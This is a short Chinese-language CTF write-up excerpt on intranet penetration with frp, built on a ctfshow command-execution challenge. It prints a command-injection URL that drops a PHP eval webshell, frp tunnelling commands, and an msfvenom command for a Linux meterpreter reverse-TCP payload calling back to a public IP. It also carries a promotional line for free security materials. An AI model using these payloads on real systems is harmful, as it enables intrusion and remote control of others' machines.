案列一(Frp内网渗透)
大概图列网上随便找的,路线是这个样子
这里选用ctfshow的一道命令执行题
由Frp实现内网访问及扫描
点击此处即可无偿领取282G网络安全学习资料
1.传入一句话,上线蚁剑
http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=`echo '<?php eval(\$_POST[1]);?>' > 1.php`;
2.进行frp转发
先服务器启动
./frps -c frps.ini
然后再kali启动
./frpc -c frpc.ini
3.制作linux马上线msf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=公网ip LPORT=6000 -f elf > shell.elf
直接拖进去并更改权限
kali开启监听